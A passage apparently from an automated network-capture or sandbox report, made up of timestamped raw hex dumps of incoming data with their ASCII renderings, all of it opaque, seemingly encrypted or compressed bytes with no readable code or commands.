b1 e1 ed 44 36 c6 b1 e4 66 c1 40 4c ee aa cf 22 cb dc c2 e9 77 18 79 9d ae a6 39 ec 62 89 de 45 7b d7 12 c0 85 44 9f e8 eb a7 c1 e9 5a f7 79 95 f5 cd d7
                                                Data Ascii: Lzj=kFa~zWDZ*b<%LP[8|=u;y/&;l^4+dwg.9PwL>UKm45Bdt7-LIx#MDa~_uzJkp{9IBadA ITbZi&f62=D6f@L"wy9bE{DZy
                                                2022-05-12 15:08:08 UTC190INData Raw: a6 ec 41 77 19 f5 46 9f 21 86 93 4f d5 88 bd 9d 3a e7 5d 08 ba f4 29 e9 ab fb 89 da d0 6f 6f 9c 2e 5b 2c 64 b2 65 d6 2d c4 16 f0 2f cb 2b 5e 40 85 c6 63 45 55 60 30 c4 31 5b 05 91 d4 a3 85 b1 6b ce fd 8a 06 7b 9f 17 ca f1 6b 20 14 a9 17 ab 61 fb a4 90 ed de a8 83 50 15 56 9c c5 31 ff 22 3d c5 ef 47 87 0b 13 83 f7 ee af 13 80 24 cd 92 1d 54 84 dd f1 77 7e e1 7f ea e2 f8 42 3b 37 5b 74 bc 0a 9a 4f 55 2b 55 08 31 68 76 31 d8 6a 2e 31 fd 50 ed 11 a2 b0 7a b5 18 6a 84 68 4e 1f 2d d0 08 0e cc 66 32 c5 16 b8 1a 02 82 e0 74 a4 81 a0 b3 9a 33 8b eb 0e 07 ae 26 be 95 53 90 8d b6 fc f4 9b ae b0 5d e9 5c 5f 68 07 11 b2 46 b6 4c 26 93 09 b6 ad b3 a6 68 e1 1e ff df 70 8a de b6 06 5c e1 83 6d de 8f 65 a4 1d 8d 14 7d 39 39 4b 6a a8 46 93 08 22 a3 c2 3e da 49 aa e9 85 7c
                                                Data Ascii: AwF!O:])oo.[,de-/+^@cEU`01[k{k aPV1"=G$Tw~B;7[tOU+U1hv1j.1PzjhN-f2t3&S]\_hFL&hp\me}99KjF">I|
                                                2022-05-12 15:08:08 UTC191INData Raw: d5 f7 d5 ea de fe 03 e4 48 85 d2 d5 eb 05 e7 74 9c 9f 15 e2 3b a2 81 16 3e a8 b1 23 9b ea b6 88 b6 3e 48 cc a7 e0 74 67 a9 6e 33 0b 91 40 b5 f5 8f 0a 33 4a 3b 84 16 71 f0 d6 bc eb 95 69 a4 cd e2 9e f7 9e 48 62 08 2c 38 e4 d1 f6 a4 d5 69 69 6f c2 0c a2 9b cc f5 a4 f9 b5 1b e3 9e 40 34 cc 1c c7 b1 f2 34 27 ba f7 9a 4e 88 fb 88 78 e5 fe 09 73 16 e7 b9 71 72 44 9a 2f 58 37 79 9e c1 2a 37 2a 8c d0 be d7 a5 b4 5d 51 f9 b4 82 8d b0 a3 f3 d7 7c 3a 8d 1a f4 fd 22 f8 c5 5b 88 1b 41 a0 f7 04 9a 5a bc 79 ae 15 e2 b3 83 2f 6c de 38 e3 f1 2b 41 aa 82 ef 73 fe b3 a6 08 90 85 71 01 68 7f bd cf 7d e5 c3 b3 ed 3b 5a c7 14 f8 20 0d 35 38 c3 25 ad b4 4a 36 bb 18 92 13 e4 28 b9 1b 1b e1 76 b2 8e 2d 80 3c 64 82 a0 e6 33 e1 a4 a0 d6 70 01 31 dc 5d 8f 13 bc e1 6c d6 e4 9b 9c 0b
                                                Data Ascii: Ht;>#>Htgn3@3J;qiHb,8iio@44'NxsqrD/X7y*7*]Q|:"[AZy/l8+Asqh};Z 58%J6(v-<d3p1]l
                                                2022-05-12 15:08:08 UTC193INData Raw: cd 60 4e b0 37 53 e2 30 63 dd a1 e4 77 e0 b2 38 49 72 9d 2e e2 2b a2 55 90 6e b3 54 97 46 2e 63 0c e4 e1 60 8a 9d 0d eb 66 54 5b 78 2b bd 08 67 d0 d9 1c 70 37 a1 8b 6d 90 b1 f6 d4 26 97 78 70 46 9e 2c ff f2 92 17 34 af 58 fb 35 10 b6 fe fa 3f 2f b8 a5 14 c4 86 85 ad 3c 59 03 94 c2 88 37 2c c1 8d 28 c6 d4 38 92 7c aa 57 6f e3 40 f5 0e 8a 03 3b e7 78 9d e6 a4 eb 43 26 82 bd 01 d4 55 3f 89 bb 45 cf 0f b3 69 d0 17 02 df 66 a6 c9 16 3c 4e 41 3b 9d 78 32 94 b4 d5 9b 9c ac f3 1d 8f de 21 55 36 c7 3c 87 52 70 2a ee 8f fe 02 97 6e f3 f8 3a 6d ad f0 bb 21 09 b4 aa d6 cb 2b af a9 b2 aa bc 09 81 c7 37 20 2c 47 37 d1 df cf 05 9f 9f b9 6e 7f 51 7f d2 e2 d6 2f 38 58 cc 52 3c 81 ce 84 3d 96 14 99 e5 49 03 34 3c e4 c7 fc de c6 b9 e9 8b bd 16 d4 29 b3 e1 9d c9 3d 83 5c af
                                                Data Ascii: `N7S0cw8Ir.+UnTF.c`fT[x+gp7m&xpF,4X5?/<Y7,(8|Wo@;xC&U?Eif<NA;x2!U6<Rp*n:m!+7 ,G7nQ/8XR<=I4<)=\
                                                2022-05-12 15:08:08 UTC193INData Raw: 0e ce 8e 65 10 3e b2 74 4d 16 5f c9 5e aa 68 25 03 6a 74 7b 11 50 8a 1d d5 5e 78 f0 7f ac 76 57 c3 0d 7d c4 6e 45 d5 64 73 ff 37 4f c8 b7 97 43 e9 b2 4b 67 72 84 27 af 0a b0 52 90 59 a4 3b a2 47 29 45 04 e5 e8 56 e9 b1 0f eb 02 56 50 78 1d 88 1d 54 d4 ba 07 70 43 bb b1 70 a9 ba 80 c8 28 86 27 7f 46 9d 2c f0 ef 85 11 3e c4 7e 93 13 1b a5 de c0 30 36 af ca 2c c8 8f 9e bc 3e 41 01 98 a3 b9 2f 3b a8 b0 2a e6 e8 26 81 15 8b 5d 62 fb 57 f2 0e a5 32 3b e1 6d 90 e9 ae 87 5e 1a 9c ad 6c f6 42 2a bf ae 50 aa 46 a4 6f c0 0c 08 d8 53 bd d5 16 3c 69 4b 0b ad 4e 3f 96 a5 b0 92 8d 8c d5 25 8b b0 03 50 3f a2 3d 9a 5d 76 26 83 a9 d7 06 82 63 e5 d5 5b 53 bd ee 8a 4e 09 a1 be c6 e0 3e b4 bf bb cf db 2b 90 ec 33 21 3e 53 29 dd f6 c0 1f b8 86 b0 1a 58 56 74 a6 c8 da 3a 18 54
                                                Data Ascii: e>tM_^h%jt{P^xvW}nEds7OCKgr'RY;G)EVVPxTpCp('F,>~06,>A/;*&]bW2;m^lB*PFoS<iKN?%P?=]v&c[SN>+3!>S)XVt:T
                                                2022-05-12 15:08:08 UTC195INData Raw: 20 f8 97 c4 85 d0 ce 4e 32 f5 1d 48 49 47 a9 5b d2 43 f2 1f f8 32 dd 7f 5e 65 8c df 5b 7b 63 3c 42 e4 30 48 22 88 fe 83 e7 cc 0f 9d e8 96 3d 6c a1 13 92 99 0e 1b 29 95 23 a3 58 a6 c1 c2 ca 99 ae 89 5a 66 5e 9f c5 40 fb 22 29 93 dd 34 97 0c 29 a2 ad a6 ca 41 82 20 dd 98 1c 5b 83 86 90 1e 50 eb 2a d0 e9 f8 2e 4b 5b 66 72 b6 3d ba 5b 44 18 00 6d 11 58 74 3a d5 0a 75 4b ff 35 d0 20 9e f6 13 a7 11 77 a1 58 7c 4c 13 c5 01 2a c8 79 34 e6 2f b7 12 1c 8b a8 11 e0 ba a6 b4 9a 26 80 8a 3e 18 ce 57 d8 f4 77 c5 8d a7 f5 a1 94 a6 c4 2c bb 5c 45 6b 66 26 92 52 a7 35 74 93 3a bc 90 82 9b 2a b0 73 fd fd 45 c6 ed a0 13 71 da ae 66 d2 f1 35 a4 28 84 41 56 31 4d 19 3a a8 70 90 69 23 8c ac 2c 8d 7f cd db ea 77 1d 8f 48 e0 16 3e cc c2 49 19 5b f4 74 28 25 67 87 73 ba 24 2d 0a
                                                Data Ascii: N2HIG[C2^e[{c<B0H"=l)#XZf^@")4)A [P*.K[fr=[DmXt:uK5 wX|L*y4/&>Ww,\Ekf&R5t:*sEqf5(AV1M:pi#,wH>I[t(%gs$-
                                                2022-05-12 15:08:08 UTC196INData Raw: 88 5f 17 8a d4 19 bb 8b bd ed a0 0d 01 f9 cb 93 75 7f f6 75 0c 61 9e 72 d4 f2 b5 0a 03 65 48 94 25 1c bb c3 d3 e1 af 0c a0 ef 8b b3 ce ed 25 7a 6a 02 0a 87 e0 ec cb f7 5b 05 28 c6 75 99 b8 a9 f9 dd ba b8 21 93 92 79 51 c6 3f 8a bb c1 51 2d ed 91 91 19 ef d4 e0 59 cb 8d 30 79 0d ac b1 7d 6a 0f 92 36 66 5b 3b 8a a0 1d 0a 69 a9 e4 d2 92 96 d1 69 67 9c 9f e9 bf ff 9f 9f d9 24 6f 9d 27 86 aa 48 d6 c4 6f e4 7d 6c d3 f5 2e a9 2a cb 1d 81 20 e2 81 bb 5a 45 f3 5b c9 c1 05 62 9f ee 8e 5a 8d b0 8f 61 dd b8 1d 09 31 11 ac f2 11 ef b4 d7 e6 0e 5a e7 2d 8a 1a 27 41 52 fd 49 84 ee 01 19 8d 74 d5 1a 9d 3a 97 7e 14 95 2e bc b8 2d 97 03 10 b8 b3 95 17 d4 c0 be c4 04 1a 3c b0 5b 8f 38 bc b2 4b d4 91 aa 94 7f 9e 44 39 ba ec 2a ef a7 e3 e0 c6 db 7b 01 d9 05 4c 2b 66 a3 7e c4
                                                Data Ascii: _uuareH%%zj[(u!yQ?Q-Y0y}j6f[;iig$o'Ho}l.* ZE[bZa1Z-'ARIt:~.-<[8KD9*{L+f~
                                                2022-05-12 15:08:08 UTC197INData Raw: b0 52 98 66 b8 11 ae 41 2f 41 19 e3 e9 6b 8a 8d 10 ed 69 54 41 49 3a bf 01 54 c5 d3 1b 7b 37 a5 97 6e ac b2 e5 d5 39 b7 00 51 46 89 31 f8 d4 92 61 3c a1 49 a4 36 10 b1 d8 e6 20 36 be a3 15 c7 e3 98 bc 1e 67 35 98 d0 89 29 20 b1 aa 24 dd ff 56 83 70 ac 67 52 fa 44 ef 0f af 26 2c fd 7a 8d e3 b1 9f 63 0c 82 c8 3f c8 54 2a 8e ba 0e 9d 33 99 74 ca 0a 08 82 44 ab cb 00 48 68 4f 16 9c 68 34 bd a9 b0 9f 8c ac c5 3a 80 b0 00 57 25 ae 1c 9d 52 04 10 f7 98 d1 05 95 41 f8 dd 2b 62 bb f5 ad 4e 34 d5 9e c6 ed 4a a6 a8 aa 90 ff 3a 96 df 31 2a 31 76 34 c3 f9 ae 0c 9e 87 83 3d 45 4d 77 d2 c0 de 33 28 4e cb 59 74 87 c5 94 0e b2 78 bf cb 40 1f 11 20 f6 e1 9d e3 cd b6 e7 ee 8a 37 d9 3d b3 e0 ba df 3d e7 72 a5 9f 13 db 3b a0 b8 16 3c 91 b1 2d a2 ea 96 82 c2 29 6e 9a e4 fc 7c
                                                Data Ascii: RfA/AkiTAI:T{7n9QF1a<I6 6g5) $VpgRD&,zc?T*3tDHhOh4:W%RA+bN4J:1*1v4=EMw3(NYtx@ 7==r;<-)n|
                                                2022-05-12 15:08:08 UTC198INData Raw: bb 60 ad e4 f1 d4 d8 b9 f1 72 07 57 9b d6 7a c5 2e 3d 82 92 25 98 1d 15 85 81 b2 da 2c 80 37 c8 b3 3b 48 f0 a9 a6 03 6f e0 5f ce e9 fe 10 7d 58 7b 11 9c 0d a7 48 57 79 13 67 17 07 11 3c d8 36 6e 31 b4 56 fa 3a 98 f0 7a 8b 12 70 b2 49 13 6d 66 f6 03 3d cc 7e 22 e4 23 ba 01 09 92 a6 1b 92 e8 80 b5 96 3d 91 ef 39 10 ad 66 c7 84 47 cc ff e2 c1 c4 b3 a4 8d 05 a9 0c 79 7f 66 3c 95 7b b6 08 12 de 34 bd b7 a9 bf 2a 86 6a c0 9b 22 ef f8 8c 2f 57 c1 b8 03 e8 cd 53 e7 3a e2 05 47 57 08 09 5c ee 67 f6 2e 35 ea e4 39 eb 1e d9 bd 88 46 7a c8 79 e6 66 12 c2 a1 7f 7e 08 cb 60 5c 07 6d a9 7f b4 45 2b 03 60 07 4c 17 5e 9b 74 dc 5e 0c e3 52 a0 62 55 ea 1f 1e e1 6e 48 c2 0b 45 e3 32 5a 96 84 fe 65 f2 b6 54 46 72 87 2b cc 60 95 43 87 60 b5 31 a5 22 2d 54 19 d5 d1 60 e8 8d 1a
                                                Data Ascii: `rWz.=%,7;Ho_}X{HWyg<6n1V:zpImf=~"#=9fGyf<{4*j"/WS:GW\g.59Fzyf~`\mE+`L^t^RbUnHE2ZeTFr+`C`1"-T`
                                                2022-05-12 15:08:08 UTC200INData Raw: 69 6f f0 78 a9 b9 be e6 96 97 a3 1c 91 92 74 51 db 38 c7 9d f5 75 25 89 85 98 6a fb b8 ad 6b db 92 05 78 04 f0 9a 6b 6d 21 b8 32 7b 68 54 a4 ab 0c 0c 5e bb 88 cd f7 89 eb 74 6b 93 96 b9 f9 a2 fb a0 cc 57 4e 8b 2f da d7 1f 8c 8e 50 e7 1e 72 c5 e4 2f 9a 4e 84 0c 81 38 a7 99 af 42 4c f5 59 d1 cd 7d 67 86 ee fa 59 fe b6 9a 7c ac 9d 05 11 50 1c b0 fb 18 ed ee c0 8a 11 3f f1 11 b9 11 30 40 11 fc 4b 9c 9d 4a 17 84 6c 8a 0c 9c 20 90 6f 0a bb 17 a3 a6 4c 9d 15 64 80 9f 92 0a f0 c1 be ff 70 04 35 c4 77 a1 29 9a 92 2e f5 90 d8 be 7f e7 50 3f d5 dd 31 8c 8e fb e0 f2 ca 0f 16 e8 6b 6e 26 64 a5 4c c3 43 e1 0a e5 38 c5 7e 18 66 bb c2 71 45 35 18 5d ed 1b 7f 00 ad ee 8f d1 f4 59 ac c8 ee 23 6f 8d 0a 8b a2 08 3f 71 9a 1d aa 42 aa fc f5 c3 c3 cb b0 51 02 76 98 db 7a cb 3f
                                                Data Ascii: ioxtQ8u%jkxkm!2{hT^tkWN/Pr/N8BLY}gY|P?0@KJl oLdp5w).P?1kn&dLC8~fqE5]Y#o?qBQvz?
                                                2022-05-12 15:08:08 UTC201INData Raw: d1 3f 46 8c bc 7a ee 95 eb 91 1c 38 10 8b a3 88 2d 49 a2 a8 4d d6 e7 56 81 63 d8 5e 77 8e 42 ed 7a 9e 15 49 cd 6e ff ce b6 eb 4f 14 ec 8e 1b b1 60 29 eb b6 57 cf 24 80 00 c0 10 6d c8 70 c4 c0 04 3c 7c 59 7f 95 7a 50 9f b4 a1 a3 b7 b7 db 55 a9 d5 31 7f 3c b5 0b 95 4e 6b 36 ed 8e ef 02 9c 66 f8 c7 5b 4d a8 e8 b7 57 3f 82 a5 dd e7 25 b6 cd ad aa c8 11 a7 c1 1f 2e 3c 57 15 db c0 c7 05 9f 9c ab 6e 6f 5c 11 e5 f3 bb 0e 14 21 e8 58 21 8e c9 83 3e 97 71 8e f8 25 21 30 3b cc e0 f9 c5 ce b0 ca e2 92 01 ff 29 aa e1 90 d0 53 b5 55 ad ce 25 d1 49 9d 81 77 15 8b d4 2e b5 ea 84 83 aa 0e 6e f1 f0 fa 7f 77 99 50 16 43 9f 79 de d2 a1 0a 03 79 4f b7 29 1f f1 ef cb fe 8b 06 ac f0 a7 a4 a0 dd 6a 59 64 26 0a 9c e0 e9 cb fc 55 2c 50 95 5e 8f ab 83 e4 96 97 9c 29 9a b8 6f 34 ee
                                                Data Ascii: ?Fz8-IMVc^wBzInO`)W$mp<|YzPU1<Nk6f[MW?%.<Wno\!X!>q%!0;)SU%Iw.nwPCyyO)jYd&U,P^)o4
                                                2022-05-12 15:08:08 UTC202INData Raw: 14 61 00 3d 57 a4 5a 3c 31 92 30 9e 4c e5 b7 72 c0 7d 1f c9 08 6d 26 62 95 71 4a 98 0e 40 a2 48 d1 70 50 e2 dc 71 e7 ea dd c7 fb 59 f5 8b 7c 60 ce 10 b4 f5 2d a3 8f fc 93 a6 c2 c1 c5 75 dd 42 0d 09 61 74 e5 28 c5 4a 13 92 5c c9 fa dd d5 7e d1 1f bc 95 4b 84 ed d2 67 0c e7 b3 70 de db 3e 8a 1e 87 23 1a 04 28 08 2a c1 77 93 1a 68 ba de 25 9f 10 c9 d2 86 46 54 dc 64 e6 66 32 df b6 7c 3d 37 db 76 46 16 50 f5 54 a9 4b 2f 02 63 66 7b 0c 58 89 00 de 64 27 f5 7e bc 63 5a e0 0f 7b f3 58 38 f4 0d 45 fc 3b 5d dd 8d c8 5f e9 a4 4c 65 7d 97 27 f0 11 d1 26 f1 0a d0 47 d6 27 4d 33 7e 8a 8e 03 9f cc 67 8f 11 31 37 1f 42 d8 6e 25 a2 ba 70 3d 37 f7 e5 0d f9 de 81 b9 48 f3 78 32 23 f9 40 91 ba fd 70 0e c6 3b f5 71 73 d3 c7 96 4f 44 c8 cc 72 aa e5 f6 d7 6e 3f 70 e0 ad ee 5b
                                                Data Ascii: a=WZ<10Lr}m&bqJ@HpPqY|`-uBat(J\~Kgp>#(*wh%FTdf2|=7vFPTK/cf{Xd'~cZ{X8E;]_Le}'&G'M3~g17Bn%p=7Hx2#@p;qsODrn?p[
                                                2022-05-12 15:08:08 UTC204INData Raw: 1b 15 fd f3 db 83 cd fd f3 b6 2a 34 f2 5e f3 99 7e f6 ae 1f 94 61 15 a0 96 5d 94 16 f8 7c e3 42 f0 76 97 25 2e 82 36 ab b9 ab c7 ee 8c 86 2f de d1 ed 89 96 d9 71 67 2d 63 c4 a9 7a 96 88 32 e7 70 da 40 5c 79 12 45 b4 09 8b a4 91 fc cb 0d f3 99 54 58 65 cc f1 9b bc aa f7 58 c5 ac 6d 77 e5 6e eb 67 dc aa 25 4e 9d f1 fe 41 31 a1 fb cd 6a f0 af 3e f5 59 70 1a 66 99 43 d0 b8 45 9e 49 1e e5 95 be 1e df 15 6e 0d 4b 0b ce 25 bf 43 a1 68 14 30 b9 9b cb 05 e9 ac 11 23 b5 bc 22 0d 01 08 c7 bb 99 e2 b0 92 d8 57 b8 e8 62 9b 9e 72 d9 c0 6a 5a f0 56 68 4f 80 d9 17 15 a6 97 cb ec 2d e7 4c fd 91 1d a9 59 d2 87 d7 42 f2 78 64 71 01 d8 a8 43 eb 4b ac c7 54 28 71 73 c7 57 2b 8c 24 b1 8b 8b 6d 07 25 88 b0 cf ef 76 33 a0 b1 75 7d 77 86 92 5a 8c 59 0e b0 3f 30 b9 4e e5 03 d7 c3
                                                Data Ascii: *4^~a]|Bv%.6/qg-cz2p@\yETXeXmwng%NA1j>YpfCEInK%Ch0#"WbrjZVhO-LYBxdqCKT(qsW+$m%v3u}wZY?0N
                                                2022-05-12 15:08:08 UTC205INData Raw: be 7b 70 b0 1a c6 ad 7b 34 13 29 7b fc 10 5e ea a4 c8 ff fc f8 ac 47 6c c9 42 19 51 c9 60 e0 bc d5 45 a3 eb a5 65 ef 01 92 b0 59 0d c7 94 d8 21 58 c8 c2 bd 8d 4d c1 c9 d0 c1 b2 40 ec a3 7d 49 46 20 db 45 85 2e 9e e9 73 31 7c ad dd 1f b5 8c b3 58 ec d0 ae b7 81 f2 20 0d 4c f6 06 49 01 2d 7a 5d 45 a1 8c 9c be b3 57 09 9a 7c ed b6 68 c4 8c c8 ad 5b ef 29 cd 93 4c a8 2e f6 55 9b 78 e0 b1 77 d1 f6 cc f1 df 7d 1c 86 ba 91 0f 13 fe 21 75 0a f1 08 b5 8b de 1f 42 9e b6 e1 5e 71 93 a0 be 8c cb 7a c3 9e c2 dd b3 9e 03 3d 08 6b 73 f8 89 bd b9 9d 39 7c 3a 17 9d eb d2 cc 92 f3 fa cb 50 ff ff 06 24 a9 4a d2 c6 27 b9 40 f3 f7 e8 0b 0a 35 e1 14 b2 f5 43 18 7d 90 7e 65 0c a0 a2 5f 07 31 3b c6 dc 7b ee 57 cd a8 be 83 7f 21 12 09 fb f1 cb 0f 44 ea 71 20 2c 3a ef 50 75 e4 68
                                                Data Ascii: {p{4){^GlBQ`EeY!XM@}IF E.s1|X LI-z]EW|h[)L.Uxw}!uB^qz=ks9|:P$J'@5C}~e_1;{W!Dq ,:Puh
                                                2022-05-12 15:08:08 UTC206INData Raw: a7 db d8 ca 76 d8 54 1d 05 6f 7c fb 2d cb 62 1c 8e 58 d1 ec d3 d2 57 dc 06 aa 95 55 92 94 db 7a 3d bc c3 07 aa bf 5a bc 5d e2 4b 3d 4f 50 7f 54 b8 05 76 c9 5b ef a4 57 ee 77 ba b5 e3 21 7a 85 02 9f 0b 7f a3 d2 1d fe fb af 16 20 7f 05 8f 2b d5 2c 4f 7a 8f f4 3c 78 2c 68 f0 bf 39 78 bc 10 cb 11 2a 0e e4 1a 53 f8 d4 4f 60 35 8c 54 2e bc d7 97 16 87 d3 3e 04 13 f4 46 a8 4e d1 26 f5 00 d6 54 d6 26 40 31 6d 8a 82 0e 8a de 7f 8a 0e 31 35 0c 46 da 75 a4 3d be 10 15 37 e4 e1 19 fe df 80 bf 4b e3 fa a7 21 ff 4e 94 9b fe 60 55 cc 38 fc 71 77 c0 b9 9c 49 42 cb d7 7f a1 fb e3 d0 4a 3b 70 e0 a6 f7 5e 54 c4 d9 4a b7 93 54 e6 17 d0 3c 01 8f 24 83 78 da 67 48 8f 18 fa 8c c6 e9 1b e3 3c c0 69 91 27 4f 69 1e 28 cf 47 e6 80 73 75 ef 69 01 c3 a1 71 3e 12 26 76 f2 09 52 e5 d4
                                                Data Ascii: vTo|-bXWUz=Z]K=OPTv[Ww!z +,Oz<x,h9x*SO`5T.>FN&T&@1m15Fu=7K!N`U8qwIBJ;p^TJT<$xgH<i'Oi(Gsuiq>&vR
                                                2022-05-12 15:08:08 UTC207INData Raw: d0 9a 7d 87 87 b6 97 67 47 80 46 e9 e0 5e 31 7f ff 25 e8 e7 4d 75 fc 1d c8 4c ec 41 eb 1e 79 b9 73 df dc 2a e3 65 75 66 fa e4 5d a6 a3 c9 91 75 6a 55 ad 2d f7 49 ed fd 32 aa e1 ca 7f fa f5 96 a6 c8 9b 58 90 d5 93 fd b7 b6 0f 5c 81 6e 30 4c 17 c3 75 b0 69 b5 68 17 b8 a9 14 50 1c db 2d f5 33 3b 5f 38 84 61 1f 5b c7 92 ff b5 88 51 d3 b9 f2 6c 08 6d 87 f1 de 6e 56 74 c6 7c c6 05 d5 93 82 22 46 d6 f4 31 7b 3c e8 33 f6 ba c9 ba eb d8 5a f7 65 73 ec c1 d2 a1 5c e0 57 2b 32 49 3f ed eb de 72 38 0c db be 89 82 63 7c 30 29 13 dc 7d d3 32 20 15 67 0a 70 15 bd ba ae 57 12 2c 9f 28 9c 47 f0 87 67 c3 77 03 de 35 74 13 66 b0 70 4a 2f 03 4d b2 c4 d0 79 7a e4 d2 75 fd ed de c2 ef 5b f5 96 60 6c 4e ec a2 e8 2f b2 0f 77 8e a4 ce dd c1 76 c1 41 11 10 64 69 e6 34 ca 7c 12 92
                                                Data Ascii: }gGF^1%MuLAys*euf]ujU-I2X\n0LuihP-3;_8a[QlmnVt|"F1{<3Zes\W+2I?r8c|0)}2 gpW,(Ggw5tfpJ/Myzu[`lN/wvAdi4|
                                                2022-05-12 15:08:08 UTC209INData Raw: 12 bd 5c 65 bb 74 41 46 3e 37 b4 f8 ae 0c fb 9a dc 00 2d 57 11 b4 8c b3 44 71 24 a1 32 68 f2 21 0d 4c f6 06 be 92 a4 37 5e 4f 82 92 98 ad a7 c8 89 9a 7d 25 a2 4f ce 8a c8 ad 4e e2 2d cf 83 4d b1 29 64 0b 04 0c e3 b4 6c cd e8 df f0 c7 7c 04 99 a0 92 1f 00 f1 21 70 19 70 cb b4 99 cc 18 d0 c1 3a ee 4e 79 88 8e b4 84 c3 68 d6 89 62 01 a1 90 05 42 0f 58 7a f6 14 7c a5 86 2c e8 24 96 02 e4 ce d0 9a ef ec c5 cc 3e fc 05 b5 a0 5e d5 55 a9 37 4f e3 f5 ef 6c 9a cd f2 7f a0 8b 56 69 72 f7 ed 6d 0c 54 cd 22 1d 42 29 b3 d3 1c 7d 5f da fd ac e7 ef c1 09 7c eb 86 c8 f8 c3 8e e1 c0 36 4f fc 37 e6 ec 68 8d b2 76 9a 08 0b d5 82 29 88 6d f7 0c ff 39 f0 82 c8 5a 3b f2 2a d0 ba 5e 14 86 90 fb 38 8b c3 8a 1a 72 8d 7c 70 23 ff 05 97 68 91 1b bf 89 6c 54 87 46 ed 71 d6 39 7f 97
                                                Data Ascii: \etAF>7-WDq$2h!L7^O}%ON-M)dl|!pp:NyhbBXz|,$>^U7OlVirmT"B)}_|6O7hv)m9Z;*^8r|p#hlTFq9
                                                2022-05-12 15:08:08 UTC209INData Raw: 47 6e 59 57 b9 ba cf 7c 87 21 07 4d 8d e4 bd 4b f2 10 14 e9 5d 23 ca 80 d0 2f 46 d0 cc b3 91 cb c9 f9 d9 d7 a9 5c 64 6e 7b 5d c9 3a 55 a8 82 bc eb 26 f2 ce ef 25 38 0d b4 0a db 58 19 29 b2 39 7a f2 21 e8 43 86 06 4a e0 37 13 5d 41 8f 81 8f 31 aa c7 f9 83 f6 62 91 49 d5 05 38 a6 04 e0 29 df 8d d2 51 39 ea c5 97 71 f0 bf 65 d8 f8 51 30 c3 73 80 92 b2 81 91 ce f7 35 e4 03 e2 97 3d 99 c4 04 5e 12 29 61 48 7f 9b 8e b4 83 cd 74 c6 89 63 d4 b2 1f 03 20 19 eb 56 e6 9a b4 b6 11 db 6b 26 9b 04 ff dd 4f ad f1 f7 c5 cd eb e8 06 b7 c9 49 c9 c6 24 3c 45 ed f6 f0 17 81 ad f2 88 57 fc 4a 0e e1 8a f2 0d 0c a3 3a 55 01 22 29 44 24 6b 61 24 c5 9d ac 11 c8 b6 15 1c eb 71 3f 8f df f5 fe a0 35 b9 d7 40 fa 8c 68 7a 45 01 86 73 10 b5 82 df af 1a eb 6b 6c 44 eb e2 cb ac 10 85 36
                                                Data Ascii: GnYW|!MK]#/F\dn{]:U&%8X)9z!CJ7]A1bI8)Q9qeQ0s5=^)aHtc Vk&OI$<EWJ:U")D$ka$q?5@hzEsklD6
                                                2022-05-12 15:08:08 UTC211INData Raw: 4b c7 9c 57 99 4b 84 cb d4 7c 2d a6 4a de ab ac d2 ac 5c f0 c1 e9 56 5f fb 54 b5 06 76 c8 54 6a 0d 44 f9 ff 0b af 69 28 74 93 16 89 04 fb a3 df 09 63 5e bc 01 5d 70 75 8f 26 cf a4 ed 65 12 7a 30 63 33 f5 68 a6 27 65 be 0d dd 97 9a 93 62 42 ab 35 3e a2 e4 eb 8d 46 af b0 c7 85 96 5a d6 2a 85 1b e6 c2 0e 40 c3 a6 50 11 ca 48 ca 3e 44 3f 7f bf 8e 1d 84 d6 67 9f 80 a4 29 14 4a c4 6c 38 ad a6 6c 0d 25 67 a0 11 cb 5c c5 a3 55 e0 fb 77 32 7b d0 83 38 b9 73 d8 81 2f 78 ff 7b cc a9 15 41 48 d8 bf 68 dc eb f6 d7 62 30 69 ac a4 c3 4e 5b 41 03 4c a0 10 5e f1 07 58 e5 00 9c a4 93 67 d2 7f 47 93 17 f1 84 dd f7 18 e0 7d c0 64 b9 25 42 e5 c5 a1 c7 5a eb 02 ab 69 65 a4 0f c6 ad 7d 2e 9b 26 6d 87 05 58 f0 cc db e1 e5 c5 b0 48 ec b8 58 25 41 46 66 e7 2d 84 a2 82 f8 39 63 ff
                                                Data Ascii: KWK|-J\V_TvTjDi(tc^]pu&ez0c3h'ebB5>FZ*@PH>D?g)Jl8l%g\Uw2{8s/x{AHhb0iN[AL^XgG}d%BZie}.&mXHX%AFf-9c
                                                2022-05-12 15:08:08 UTC212INData Raw: e9 10 dd 41 f9 41 eb 06 71 b3 7e c3 a1 25 ec 6e 79 ef ff e6 57 b5 ac c9 86 77 7f 5e be 26 e4 44 ed e9 26 ac e3 d4 e1 19 64 19 45 c8 9d 58 89 d5 8a f2 36 9f 12 5b 81 6e 3f cb ff db 28 a5 36 a7 7a 97 41 b6 1f 43 0c c0 a8 15 3f 27 d1 d9 84 74 12 4c c5 9a ea ad 85 44 cb b2 e6 78 1c ef 7c ff de 6e 43 62 dc 70 dc 8e c5 98 82 23 06 d6 f4 22 63 24 ff b9 02 ad 43 59 d6 d8 4f ef 7d 7e f9 d9 d9 a7 59 e2 4c a7 c9 46 b8 09 fc 40 da 38 0e ef b1 0f 81 63 8a 8e 1b 91 24 7c a6 2d 01 1b 66 1a e5 ea 2d dc a1 48 9f 8c 93 32 9d 53 f2 9f 7f db 78 16 dc 3d 7d 02 63 a7 f1 b5 8d 0d 4b bd 48 d1 7d 65 f0 52 a9 e1 fa 42 cf e6 4e 65 57 7d 6c 4f 1c b0 e9 3d b1 0c ea 9b bd da c8 c6 76 d3 57 0d 0c 73 67 7b f5 c3 68 93 9b 53 df e3 de dc 43 d0 16 ba 9c 41 88 9e 53 fa 24 bc cf 23 aa ac d0
                                                Data Ascii: AAq~%nyWw^&D&dEX6[n?(6zAC?'tLDx|nCbp#"c$CYO}~YLF@8c$|-f-H2Sx=}cKH}eRBNeW}lO=vWsg{hSCAS$#
